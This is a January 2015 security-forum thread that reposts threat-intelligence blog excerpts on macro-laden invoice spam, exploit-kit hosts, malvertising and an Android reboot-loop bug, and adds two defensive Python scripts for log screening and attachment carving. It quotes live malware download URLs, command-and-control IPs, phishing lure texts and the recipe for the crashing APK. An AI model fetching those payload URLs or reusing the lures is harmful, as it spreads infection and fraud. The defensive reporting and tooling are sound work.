20140918_122519.doc
813536MY.xls
ACH Transfer 0084.doc
Automated Clearing House transfer 4995.doc
BAC474047MZ.xls
BILLING DETAILS 4905.doc
CAR014 151239.doc
ID_2542Z.xls
Fuel bill.doc
ORDER DETAILS 9650.doc
Payment Advice 593016.doc
SHIPPING DETAILS 1181.doc
SHIP INVOICE 1677.doc
SHIPPING NO.doc
Microsoft Technet blog* says that the two Trojan downloaders, TrojanDownloader:W97M/Adnel and TrojanDownloader:O97M/Tarbir are being spread at a rapid pace through spam emails and phishing campaigns..."
* http://blogs.technet.com/b/mmpc/archive/2015/01/02/before-you-enable-those-macros.aspx
2 Jan 2015
:fear: :mad: :fear:
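The dynamoo posts above (the hqq.tv chain, the 'National Payments Centre' and 'PAYMENT ADVICE' runs) each end in a recommended blocklist, plus the advice to widen the two C2 hosts to their /24s and to check logs for machines that already talked to them. The script below is an added example of doing that (my code, not dynamoo's). The addresses are the ones quoted in those posts; the log lines and their "timestamp client dst_ip method url" layout are constructed for the demo, and 179.43.141.200 is a made-up neighbour inside the widened /24.

```python
"""Screen proxy logs for traffic to the blocklisted hosts above.

Added example, not the bloggers' own tooling. The addresses are the
ones quoted in the posts; the log lines and their
'timestamp client dst_ip method url' layout are constructed.
"""
import ipaddress
from collections import defaultdict

# Download hosts from the 'National Payments Centre' / 'PAYMENT ADVICE' runs,
# the two C2 addresses, and the EK servers from the hqq.tv chain (all quoted above).
BLOCKLIST = [
    "213.174.162.126", "194.28.139.100", "206.72.192.15", "213.9.95.58",
    "194.146.136.1", "179.43.141.164",
    "108.61.165.69", "178.62.147.144", "128.199.52.108", "128.199.48.44",
]

# The post suggests "possibly the entire /24s" for the two C2 hosts.
WIDEN_TO_24 = {"194.146.136.1", "179.43.141.164"}

# Download path shared by all four macro variants in the posts.
SUSPICIOUS_PATHS = ("/mans/pops.php",)


def build_networks(blocklist=BLOCKLIST, widen=WIDEN_TO_24):
    """Turn the address list into networks, widening selected hosts to /24."""
    nets = []
    for ip in blocklist:
        prefix = 24 if ip in widen else 32
        nets.append(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))
    return nets


def classify_line(line, nets):
    """Return (client, reasons) for one log line; reasons is empty when clean."""
    fields = line.split()
    if len(fields) != 5:
        return None, ["unparseable line"]
    _ts, client, dst, _method, url = fields
    try:
        dst_addr = ipaddress.ip_address(dst)
    except ValueError:
        return client, ["bad destination address"]
    reasons = []
    for net in nets:
        if dst_addr in net:
            reasons.append(f"destination {dst} in blocklisted {net}")
            break
    for path in SUSPICIOUS_PATHS:
        if path in url:
            reasons.append(f"url contains {path}")
    return client, reasons


def suspect_clients(lines, nets):
    """Map each internal client to the reasons its traffic was flagged."""
    suspects = defaultdict(list)
    for line in lines:
        client, reasons = classify_line(line, nets)
        if client and reasons:
            suspects[client].extend(reasons)
    return dict(suspects)


# Constructed log lines: one macro download, one hit via the widened /24, one clean.
SAMPLE_LOG = [
    "2015-01-06T09:01:12Z 10.0.0.15 213.174.162.126 GET http://213.174.162.126:8080/mans/pops.php",
    "2015-01-06T09:01:40Z 10.0.0.15 179.43.141.200 POST http://179.43.141.200/Xz/cb",
    "2015-01-06T09:02:03Z 10.0.0.22 93.184.216.34 GET http://example.com/",
]

if __name__ == "__main__":
    for client, reasons in sorted(suspect_clients(SAMPLE_LOG, build_networks()).items()):
        print(client, "->", "; ".join(reasons))
```

Matching on the URL path as well as the address matters here: the four macro variants fetched the same /mans/pops.php path from different hosts, so a new host with the same path still surfaces, and the post's observation that the payload is "hardened against analysis" means the proxy log may be the only evidence you get.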
AplusWebMaster
2015-01-07, 11:50
FYI...
Exploit kits on Choopa LLC / Gameservers .com IP addresses
- http://blog.dynamoo.com/2015/01/exploit-kits-on-choopa-llc.html
7 Jan 2015 - "... The characteristics of these malicious landing pages are that they use free domains (currently .co.vu) and seem to have a very short lifespan. As I write this, the following malicious domains are LIVE:
ooshuchahxe .co.vu
ahjoneeshae .co.vu
phamiephim .co.vu
kaemahchuum .co.vu
pahsiefoono .co.vu
kaghaingai .co.vu
buengaiyei .co.vu
ohmiajusoo .co.vu
oodeerahshe .co.vu
paotuchepha .co.vu
aedeequeekou .co.vu
eikoosiexa .co.vu
phielaingi .co.vu
thohbeekee .co.vu
A typical exploit landing page looks like this* which appears to be the Nuclear EK. These are hosted on the following Choopa LLC / Gameservers .com IP addresses (it is the same company with two different trading names) [clicking the IP leads to the VirusTotal results, ones identified as malicious are highlighted]:
108.61.165.69: https://www.virustotal.com/en/ip-address/108.61.165.69/information/
108.61.165.70: https://www.virustotal.com/en/ip-address/108.61.165.70/information/
108.61.165.96: https://www.virustotal.com/en/ip-address/108.61.165.96/information/
108.61.167.160: https://www.virustotal.com/en/ip-address/108.61.167.160/information/
108.61.172.139: https://www.virustotal.com/en/ip-address/108.61.172.139/information/
108.61.175.125: https://www.virustotal.com/en/ip-address/108.61.175.125/information/
108.61.177.107: https://www.virustotal.com/en/ip-address/108.61.177.107/information/
108.61.177.89: https://www.virustotal.com/en/ip-address/108.61.177.89/information/
... these domains seem to have a very short life. I identified nearly 3000 domains using these nameservers, the following of which are flagged as malicious by Google... Recommended minimum blocklist (Choopa LLC IPs are highlighted):
108.61.123.219
108.61.165.69
108.61.165.70
108.61.165.96
108.61.167.160
108.61.172.139
108.61.172.145
108.61.175.125
108.61.177.107
108.61.177.89
108.61.198.148
108.61.211.121
64.187.225.245
104.224.147.220
UPDATE: Choopa LLC say they have terminated those IPs**. However, it may still be worth reviewing your logs for traffic to these servers as they might identify machines that have been compromised."
* http://urlquery.net/report.php?id=1420560803160
** https://2.bp.blogspot.com/-6jzwvTDMi9U/VK1T26Lei_I/AAAAAAAAGFs/H6-oPE7HwA8/s1600/choopa.png
___
Huffington Post and Gamezone visitors targeted with malvertising, infected with ransomware
- http://net-security.org/malware_news.php?id=2936
Jan 7, 2015 - "The last days of the past and the first days of the current year have been unlucky for visitors of several popular sites including the Huffington Post and Gamezone .com, which were unknowingly serving malicious ads that ultimately led to a ransomware infection. Cyphort Lab researchers first spotted the malvertising campaign on New Year's Eve on the HuffPo's Canadian website. A few days later, the ads were served on HuffingtonPost .com. The ensuing investigation revealed that the source of the ads is advertising .com, an AOL ad-network. Visitors to the sites who were served the ads were automatically redirected to a landing page hosting either the Neutrino or the Sweet Orange exploit kit. The kits served several exploits, and if one of them was successful, a new variant of the Kovter ransomware was downloaded and executed. Kovter* blocks the targeted computer's keyboard and mouse, usually demands a ransom of around $300, and searches the web browser's history for URLs of adult content sites to include in the ransom note. AOL has been notified of the problem, and has removed the malicious ads from rotation both in their advertising.com ad-network as well as in their adtech .de one... This is not the first time that Kovter was delivered in this way. Another malvertising campaign targeting YouTube users** was spotted in October 2014."
* http://www.net-security.org/malware_news.php?id=2450
** http://www.net-security.org/malware_news.php?id=2883
Sweet Orange exploit kit/NeutrinoEK: http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/
>> http://www.cyphort.com/huffingtonpost-serving-malware/
___
Fake 'Accounts Payable - Remittance Advice' SPAM - doc malware
- http://myonlinesecurity.co.uk/senior-accounts-payable-specialist-remittance-advice-word-doc-malware/
7 Jan 2015 - "'Remittance Advice for 945.66 GBP' (random amounts) pretending to come from a random named Senior Accounts Payable Specialist at a random company with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Update: we are also seeing a slightly different version with the subject Invoice 2907.51 GBP (random amounts) with an Excel XLS attachment... The email looks like:
Please find attached a remittance advice for recent BACS payment of 945.66 GBP.
Any queries please contact us.
Katie Carr
Senior Accounts Payable Specialist
BUSHVELD MINERALS LTD
7 January 2015 : REM_5160JW.doc - Current Virus total detections: 4/56*
... [1]connects to 193.136.19.160 :8080//mans/pops.php and downloads the usual dridex to %temp%\1V2MUY2XWYSFXQ.exe Current VirusTotal definitions 4/56**
RBAC_2856PJ.xls Current Virus total detections: 3/56***
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9bb9d75b19588ae6d5099e6f9f69485410a39da3e3c69d02db2756ad527d4e0b/analysis/1420634098/
** https://www.virustotal.com/en/file/f96c2e9c17fe8a9a93251c93ed477d0715f8a06b465420c2ffa2e713ca7b8256/analysis/1420635840/
... Behavioural information:
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
*** https://www.virustotal.com/en/file/f50ca59a7e263a9b8f6b3432d380aebca85dfe041872812c81aafa26bf3b3973/analysis/1420636228/
1] 193.136.19.160: https://www.virustotal.com/en/ip-address/193.136.19.160/information/
___
Fake 'NUCSOFT-Payroll' SPAM - doc malware
- http://myonlinesecurity.co.uk/eliza-fernandes-nucsoft-payroll-december-2014-word-doc-malware/
7 Jan 2015 - "'NUCSOFT-Payroll December 2014' pretending to come from Eliza Fernandes <eliza_fernandes@ nucsoft .co.in> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... The email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/NUCSOFT-Payroll-December-2014.jpg
7 January 2015 : Payroll Dec’14.doc . Current Virus total detections: 2/56*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7705658817366db2e7e82a39207e510a89678d3b06e02a1ec6685bb05231b011/analysis/1420619222/
- http://blog.dynamoo.com/2015/01/malware-spam-eliza-fernandes-nucsoft.html
7 Jan 2015
> https://www.virustotal.com/en/file/7705658817366db2e7e82a39207e510a89678d3b06e02a1ec6685bb05231b011/analysis/1420623113/
>> https://www.virustotal.com/en/file/4d3bb0cfba9f6090e2704fe003e373002f906df0d59c68e73ff0d8a20cd36884/analysis/1420624521/
Recommended blocklist:
59.148.196.153: https://www.virustotal.com/en/ip-address/59.148.196.153/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___
Malformed AndroidManifest.xml in Apps Can Crash Mobile Devices
- http://blog.trendmicro.com/trendlabs-security-intelligence/malformed-androidmanifest-xml-in-apps-can-crash-mobile-devices/
Jan 7, 2015 - "Every Android app comprises several components, including something called the AndroidManifest.xml file or the manifest file. This manifest file contains essential information for apps, “information the system must have before it can run any of the app’s code.” We came across a vulnerability related to the manifest file that may cause an affected device to experience a -continuous- cycle of rebooting — rendering the device nearly useless to the user. The Manifest File Vulnerability: The vulnerability can cause the OS to crash through two different ways. The first involves very long strings and memory allocation. Some apps may contain huge strings in their .XML files, using document type definition (DTD) technology. When this string reference is assigned to some of the tags in AndroidManifest.xml (e.g., permission name, label, name of activity), the Package Parser will require memory to parse this .XML file. However, when it requires more memory than is available, the PackageParser will crash. This triggers a chain reaction wherein all the running services stop and the whole system consequently reboots once. The second way involves .APK files and a specific intent-filter, which declares what a service or activity can do. An icon will be created in the launcher if the manifest file contains an activity definition with this specific intent-filter:
<intent-filter>
<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>
</intent-filter>
If there are many activities defined with this intent-filter, the same number of icons will be created in the home page after installation. However, if this number is too large, the .APK file will trigger a loop of rebooting. If the number of activities is bigger than 10,000:
For Android OS version 4.4, the launcher process will undergo the reboot.
For version L, the PackageParser crashes and reboots. The malformed .APK will be installed but no icon will be displayed. If the number of activities is larger than 100,000, the devices will undergo the -loop- of rebooting...
We have tested and proven that this created APK could -crash- both Android OS 4.4.4, Android OS L, -and- older versions of the platform... While this vulnerability isn’t technically a security risk, it does put devices at risk in terms of functionality. This vulnerability can essentially leave devices useless. Affected devices can be “rescued” but -only- if the Android Debug Bridge (ADB) is activated or enabled. The only solution would be to connect the device to a computer, boot the phone in fastboot mode, and flash the ROM. Unfortunately, such actions can only be done by highly technical users as a mistake can possibly brick a device. For this issue, we recommend that users contact customer service (if their devices are still under warranty) or a reputable repair shop. We have notified Google about this issue."
___
Fake Flight QZ8501 Video on Facebook
- https://blog.malwarebytes.org/fraud-scam/2015/01/dont-share-this-fake-flight-qz8501-video-on-facebook/
Jan 6, 2015 - "... If you’re waiting on information with regard to what caused the tragic crash of AirAsia Flight QZ8501, please be aware that the inevitable fake Facebook video links are now putting in an appearance. Here’s one, located at: bergkids(dot)com/qz8501 - The page is pretty bare, save for the imagery of what they claim is the plane in question and the following text:
[CRASH VIDEO] AirAsia Flight QZ8501 Crashed near east coast of Sumatera.
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz1.jpg
Clicking the play button encourages Facebook users to share it, before being redirected to an -imitation- YouTube page located at: urvashi(dot)altervista(dot)org/video/vid(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz2.jpg
While visitors might think this would be the video in question, in actual fact they’re looking at a sort of -fake- video -farm- where clicking the link takes them to a wide variety of phony clip scams... From there, they’re then (re)directed to one of the links in the screenshot above. There’s everything from “You won’t eat [product x] again after seeing this” to non-existent leaked celebrity tapes. Disturbingly, two of the pages claim to show car accidents and one of them uses a rather graphic photograph. Given that people could be arriving there from a personal need to find out more information about the plane crash, this is just more proof that the people behind these pages couldn’t care less... All of the above pages return the visitor to the “main” Altervista URL, where they’ll be asked to share then be sent to another of the links in the -redirect- code. It seems to be a way of trying to drop the links on as many feeds as possible (assuming the Facebook account owner changes the share option from “just me” to people in their social circles). Should the weary clicker grow tired of this digital roundabout and simply sit on the altervista page too long, they’ll find that they’re automatically sent to a page called “Horrific Video”:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/fakeqz5.jpg
Unlike the other pages which simply loop potential victims around while asking them to share links, this one will take them to a -survey- page if the video “player” is clicked... As with all other survey pages, the links could lead to everything from offers and personal questions to ringtone signups or software installs and are usually served up according to region... If you want to know the latest information on the AirAsia crash, please stick to news sources you know and trust. It’s extremely unlikely someone is going to have exclusive footage sitting on some video website you’ve never heard of, and the moment you’re caught in a loop of “Share this on Facebook to view” messages you can bet there’s nothing on offer except someone trying to make a fast buck."
:fear::fear: :mad:
AplusWebMaster
2015-01-08, 14:53
FYI...
Fake 'invoice EME018' SPAM – doc malware
- http://myonlinesecurity.co.uk/ieuan-james-invoice-eme018-docx-word-doc-malware/
8 Jan 2015 - "'invoice EME018.docx' pretending to come from Ieuan James <emerysieuan@ gmail .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has come in corrupted on my email server and looks like this (I am sure some email servers will serve up a working version) :
--Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905
Content-Type: text/plain;
charset=us-ascii
Content-Transfer-Encoding: 7bit
--Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905
Content-Type: application/msword;
name="invoice EME018.doc";
x-apple-part-url=D103C3C9-1CC9-4BE2-89E7-EB608B41F92A
Content-Disposition: attachment;
filename="invoice EME018.doc"
Content-Transfer-Encoding: base64 ...
... extracted the malicious word doc from the content.
8 January 2015 : invoice EME018.doc - Current Virus total detections: 1/56*
According to Dynamoo’s blog[1] this EME018.doc malware file will connect to one of these sites http ://ecovoyage.hi2 .ro/js/bin.exe http ://mateusz321.cba .pl/js/bin.exe - This binary is saved as %TEMP%\oHIGUIgifdg.exe and has a VirusTotal detection rate of 10/55** ..."
* https://www.virustotal.com/en/file/66a2de2890ebaf7ca4521f97a44c5f30371aea72dc1023b051fea4ef3da94ece/analysis/1420701971/
** https://www.virustotal.com/en/file/12f6d880b94e16fbc1fca0ba1c97b47373e81e03cffc8d08954db13dea1c0678/analysis/1420708713/
1] http://blog.dynamoo.com/2015/01/malware-spam-ieuan-james-invoice.html
8 Jan 2015 - "... this morning I've seen a handful of these malformed malware spams, claiming to be from a Ieuan James and with a subject of invoice EME018.docx. The body text contains some Base64 encoded data which presumably is meant to be an attachment... Recommended minimum blocklist:
59.148.196.153
74.208.11.204
129.215.249.52
78.140.164.160
37.1.208.21
86.156.238.178
In addition I suggest blocking 3NT Solutions LLP / inferno.name IP ranges on sight. I would very strongly recommend blocking the entire 37.1.208.0/21 range..."
___
Fake 'INVOICE ADVISE' and 'NOVEMBER INVOICE' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/01/malware-spam-invoice-advise-08012015.html
8 Jan 2015 - "These two -spam- runs have different email messages but the same payload. In both cases, there are multiple -fake- senders:
Sample 1 - INVOICE ADVISE 08/01/2015
From: Mia Holmes
Date: 8 January 2015 at 09:11
Subject: INVOICE ADVISE 08/01/2015
Good morning
Happy New Year
Please could you advise on the November GBP invoice in the attachment for me?
Many thanks
Kind Regards
Mia Holmes
Accountant
SULA IRON & GOLD PLC
Sample 2 - NOVEMBER INVOICE
From: Reed Barrera
Date: 8 January 2015 at 09:16
Subject: NOVEMBER INVOICE
Good morning
Happy New Year
Please could you advise on the November GBP invoice in the attachment for me?
Many thanks
Kind Regards
Reed Barrera
Controller
ASSETCO PLC
Other sender names include:
- Marlin Rodriquez
Accountant
CLONTARF ENERGY PLC
- Olive Pearson
Senior Accountant
ABERDEEN UK TRACKER TRUST PLC
- Andrew Salas
Credit Management
AMTEK AUTO
The attachment is in a Word document (in one sample it was a Word document saved as an XLS file). Example filenames include:
RBAC_9971IV.xls
INV_6495NU.doc
2895SC.doc
There are -four- different malicious files that I have seen so far, all with low detection rates [1] [2] [3] [4] which contain in turn one of these macros... leading to a download from one of the following locations:
http ://188.241.116.63 :8080/mops/pops.php
http ://108.59.252.116 :8080/mops/pops.php
http ://178.77.79.224 :8080/mops/pops.php
http ://192.227.167.32 :8080/mops/pops.php
This file is downloaded as g08.exe which is then copied to %TEMP%\1V2MUY2XWYSFXQ.exe. This file has a detection rate of 3/56*. The VT report shows a POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known malware server which I recommend that you block. This IP is confirmed in the Malwr report which also shows a dropped DLL which is the same as found in this spam run and has a detection rate of just 2/56**."
1] https://www.virustotal.com/en/file/e0225133c9a4987fcb29c8e646225496248c16a033a565b70b77f4288071b426/analysis/1420712512/
2] https://www.virustotal.com/en/file/b018c37bd4b27d8fcfc543d05ef5c0f0477551afe4a396584c6f1b83aeacfa92/analysis/1420712527/
3] https://www.virustotal.com/en/file/b1c10f76fc15c3ca6ca89df5335d716241e57951098f7324bbe8c627430a0af6/analysis/1420712717/
4] https://www.virustotal.com/en/file/d75b7a1865bed23978462197e7b5d8f1f25dd7eec8244d29f4710dc22bf6e36e/analysis/1420713398/
* https://www.virustotal.com/en/file/bc93e9bdf92f0a9fb24ccbf053f59d79e31588a956204b4d09efff1091a40c89/analysis/1420713841/
** https://www.virustotal.com/en/file/b56547ec2ee8185f772f1cdf034573883df442e4e9fde458fcf526a97563d53b/analysis/1420714510/
- http://myonlinesecurity.co.uk/november-invoice-word-doc-excel-xls-malware/
8 Jan 2015: INV_7330KQ.doc - Current Virus total detections: 1/56*
* https://www.virustotal.com/en/file/bc93e9bdf92f0a9fb24ccbf053f59d79e31588a956204b4d09efff1091a40c89/analysis/1420713841/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
:fear: :mad:
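The 'invoice EME018' mail quoted above arrived with its MIME parts dumped into the text body, and the attachment was only recovered by carving it out by hand; the same post notes that the subject promises a .docx while the part is a legacy .doc, and the 'INVOICE ADVISE' run shipped a Word document renamed to .xls. The following is an added example, not code from the quoted blogs, showing one way to automate that carve-and-check: scan the raw text for base64 parts with a filename, decode them, hash them for the VirusTotal lookup, and compare the container the bytes actually are (PE, PDF, OOXML zip, OLE2 Word/Excel) with the one the extension claims. RAW_MAIL is constructed here to mirror the malformed message; the attachment bytes are a stand-in blob with an OLE2 header and a few directory stream names, not a real document, and the boundary string, the stream-name heuristics and the extension table are this example's own assumptions.

```python
"""Carve base64 attachments out of a malformed MIME message and check that the
bytes match what the filename claims. Added example, not code from the quoted
blogs: RAW_MAIL is constructed to mirror the 'invoice EME018' mail (MIME parts
dumped into the text body); its attachment is a stand-in blob, not a document.
"""
import base64
import hashlib
import re

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
MAGICS = [(b"MZ", "pe"), (b"%PDF", "pdf"), (b"PK\x03\x04", "zip-ooxml"), (OLE2_MAGIC, "ole2")]
# OLE2 directory entries hold stream names as UTF-16LE; a substring search is a
# cheap heuristic for Word vs Excel and for the presence of a VBA project.
WORD_STREAM = "WordDocument".encode("utf-16-le")
EXCEL_STREAM = "Workbook".encode("utf-16-le")
VBA_STREAM = "_VBA_PROJECT".encode("utf-16-le")
# Container each extension promises; anything else counts as "unknown".
EXPECTED = {"doc": "ole2-word", "dot": "ole2-word", "xls": "ole2-excel",
            "docx": "zip-ooxml", "docm": "zip-ooxml", "xlsx": "zip-ooxml",
            "zip": "zip-ooxml", "pdf": "pdf", "exe": "pe", "scr": "pe"}
FILENAME_RE = re.compile(r'filename="?([^";\r\n]+)"?', re.I)
B64_RE = re.compile(r"content-transfer-encoding:\s*base64", re.I)


def carve_base64_attachments(text):
    """[(filename, bytes)] for every base64 part that names a file. Scans raw
    text rather than a MIME parser, so parts whose boundaries ended up inside
    the body (as in the quoted sample) are still found."""
    found, lines, i = [], text.splitlines(), 0
    while i < len(lines):
        if not lines[i].lower().startswith("content-"):
            i += 1
            continue
        block = []
        while i < len(lines) and lines[i].strip():      # part headers end at a blank line
            block.append(lines[i])
            i += 1
        headers = "\n".join(block)
        name = FILENAME_RE.search(headers)
        if name and B64_RE.search(headers):
            i += 1                                       # skip the blank separator
            chunks = []
            while i < len(lines) and lines[i].strip() and not lines[i].startswith("--"):
                chunks.append(lines[i].strip())          # body runs to the next boundary
                i += 1
            found.append((name.group(1), base64.b64decode("".join(chunks))))
    return found


def classify(data):
    """Name the container from magic bytes, ignoring the extension entirely."""
    for magic, kind in MAGICS:
        if data.startswith(magic):
            if kind == "ole2" and WORD_STREAM in data:
                return "ole2-word"
            if kind == "ole2" and EXCEL_STREAM in data:
                return "ole2-excel"
            return kind
    return "unknown"


def mismatch(filename, kind):
    """True when the extension promises one container but the bytes are another."""
    return EXPECTED.get(filename.lower().rsplit(".", 1)[-1], "unknown") != kind


def analyze_mail(raw_text):
    """One record per carved attachment: hash to look up, real type, red flags."""
    results = []
    for filename, data in carve_base64_attachments(raw_text):
        kind = classify(data)
        results.append({"filename": filename, "kind": kind,
                        "sha256": hashlib.sha256(data).hexdigest(),
                        "extension_mismatch": mismatch(filename, kind),
                        "vba_hint": kind.startswith("ole2") and VBA_STREAM in data})
    return results


# Constructed stand-in: OLE2 magic plus the stream names a macro-bearing Word
# file carries in its directory. Not a real document, and not malware.
FAKE_DOC = OLE2_MAGIC + b"\x00" * 504 + WORD_STREAM + b"\x00" * 40 + VBA_STREAM
RAW_MAIL = (
    "Subject: invoice EME018.docx\n\n"
    "--Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905\n"
    "Content-Type: text/plain;\n\tcharset=us-ascii\n"
    "Content-Transfer-Encoding: 7bit\n\n"
    "--Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905\n"
    'Content-Type: application/msword;\n\tname="invoice EME018.doc";\n'
    "\tx-apple-part-url=D103C3C9-1CC9-4BE2-89E7-EB608B41F92A\n"
    'Content-Disposition: attachment;\n\tfilename="invoice EME018.doc"\n'
    "Content-Transfer-Encoding: base64\n\n"
    + base64.encodebytes(FAKE_DOC).decode("ascii")
    + "--Apple-Mail-2E10F14F-2909-483A-9642-7C58A403A905--\n"
)
```

`analyze_mail(RAW_MAIL)` returns one record whose `kind` is `ole2-word` and whose `vba_hint` is set, with no mismatch against the `.doc` filename; `mismatch("invoice EME018.docx", "ole2-word")` and `mismatch("RBAC_9971IV.xls", "ole2-word")` both return True, which is the check a mail gateway would apply to the subject line and to the renamed-XLS sample. The stream-name search is only a hint; a real triage would parse the compound-file directory (for instance with oletools) before trusting it.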
AplusWebMaster
2015-01-09, 15:16
FYI...
Fake 'Monthly Invoice & Report' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-do-not-reply-datasharp-uk.html
9 Jan 2015 - "This spam email pretends to be from a wholly legitimate company called Datasharp UK Ltd but it isn't, it is a spoof. Datasharp is not sending the spam, their systems have not been compromised in any way.
From: ebilling@ datasharp .co
Date: 9 January 2015 at 06:55
Subject: DO-NOT-REPLY Datasharp UK Ltd - Monthly Invoice & Report
THIS MESSAGE WAS SENT AUTOMATICALLY
Attached is your Invoice from Datasharp Hosted Services for this month.
To view your bill please go to www .datasharp .co.uk. Allow 24 hours before viewing this information.
For any queries relating to this bill, please contact hosted.services@ datasharp .co.uk or call 01872 266644.
Please put your account number on your reply to prevent delays
Kind Regards
Ebilling
So far I have seen two different Word documents attached with low detection rates at VirusTotal [1] [2] containing one of two malicious macros... which then attempt to download an additional component from the following locations:
http ://TICKLESTOOTSIES .COM/js/bin.exe
http ://nubsjackbox.oboroduki .com/js/bin.exe
The tickletootsies .com download location has been cleaned up, but the other one is still working as it downloads a file with a VirusTotal detection rate of 5/56*. That VirusTotal report also shows that it attempts to POST to 74.208.11.204:8080 (1&1, US) which has been a malware C&C server for several weeks and is definitely worth blocking.
UPDATE: the Malwr report shows connections to the following IPs which I recommend you block:
59.148.196.153
74.208.11.204 "
1] https://www.virustotal.com/en/file/1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a/analysis/1420794297/
2] https://www.virustotal.com/en/file/e703aef67351b56c9f0d9445382ddeb15af0b852397d310944a1b654fe880d10/analysis/1420794299/
* https://www.virustotal.com/en/file/572ce4b7a105718db6ae70a1d8a28f339fe916061880a116e0d046ec92784e22/analysis/1420793909/
- http://myonlinesecurity.co.uk/not-reply-datasharp-uk-ltd-monthly-invoice-report-word-doc-malware/
9 Jan 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/DO-NOT-REPLY-Datasharp-UK-Ltd-Monthly-Invoice-Report.jpg
* https://www.virustotal.com/en/file/1f98eb75e208270fe58e7a95dbab5facd61db611f0b0cbbc6ace61d183d2a64a/analysis/1420787444/
** https://www.virustotal.com/en/file/e703aef67351b56c9f0d9445382ddeb15af0b852397d310944a1b654fe880d10/analysis/1420787603/
*** https://www.virustotal.com/en/file/572ce4b7a105718db6ae70a1d8a28f339fe916061880a116e0d046ec92784e22/analysis/1420793909/
___
Fake 'Fax' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-employee-documents.html
9 Jan 2015 - "This -fake- fax run is a variation of this one* from yesterday.
From: Fax [no-replay@ fax-voice .com]
Date: 9 January 2015 at 14:52
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: <redacted> ...
As before, there are several links leading to different download locations... These landing pages lead to a pair of jjencoded javascripts hosted on different files. I explained a little about those last time* ... the download location that you coax out of the script is time-limited. If you wait too long, you get a nonsense script instead. And possibly even more interesting is that every time you download the target ZIP file "message.zip ;.zip ;.zip ;" it seems to be different... That led to -10- different ZIP files containing different EXE files... Although those reports indicate some difference in the port numbers, we can see the following URLs being accessed:
http ://202.153.35.133 :55365/0901us1/HOME/0/51-SP3/0/
http ://202.153.35.133 :55365/0901us1/HOME/1/0/0/
http ://crecrec .com/mandoc/nuts12.pdf
http ://202.153.35.133 :55350/0901us1/HOME/41/7/4/
http ://samrhamburg .com/img/ml1.tar
202.153.35.133 (Excell Media Pvt Lt, India) is probably the key thing to block. Despite the differences in the downloader, they all seem to drop a randomly-named file with identical characteristics in each case. This has a VirusTotal detection rate of 1/55** and you can see the Malwr report for that file here***..."
* http://blog.dynamoo.com/2015/01/myfax-no-replaymy-faxcom-spam-campaign.html
** https://www.virustotal.com/en/file/86f0fea9f2cbe4d542f9519120a8df4c20c4ad85539601859c009639d060ce9b/analysis/1420818425/
*** https://malwr.com/analysis/ZjMwNTJiMjEwNDcyNDkxOGEzZTZmZjVjYWE0ZmQwZDU/
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___
Bingham McCutchen Law Firm Spam
- http://threattrack.tumblr.com/post/107594031823/bingham-mccutchen-law-firm-spam
Jan 9, 2015 - "Subjects Seen:
Judicial summons
Typical e-mail details:
Warrant to appear Please be informed that you are expected in the Hamilton County Court of Appeals on February 2nd, 2015 at 9:30 a.m. where the hearing of your case of illegal software use will take place. You may obtain protection of a lawyer, if necessary.
Please bring your identity documents to the Court on the named day. Attendance is compulsory.
The detailed plaint note is attached to this letter, please download and read it thoroughly.
Clerk of court,
Jacob Velez
Malicious URLs:
joalpe.firebearstudio .com/dir.php?bh=oBRzRrtM0A02ooUI1aER2YGsHzIP29bCneRZntfom+A=
Malicious File Name and MD5:
PlaintNote_BinghamMcCutchen_00588315.exe (E1A7061CCB8997EAB296AA84454B072B)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7039d07d7335501cb375a1b4d3632bf5/tumblr_inline_nhwvymzDyH1r6pupn.png
Tagged: law firm, Kuluoz
___
Fake CNN Twitter Feeds SPAM weight loss links
- https://blog.malwarebytes.org/fraud-scam/2015/01/fake-cnn-twitter-feeds-spam-weight-loss-links/
Jan 9, 2015 - "We’ve noticed a number of fake CNN-themed Twitter accounts driving traffic to a couple of different weight loss sites. The accounts in question are:
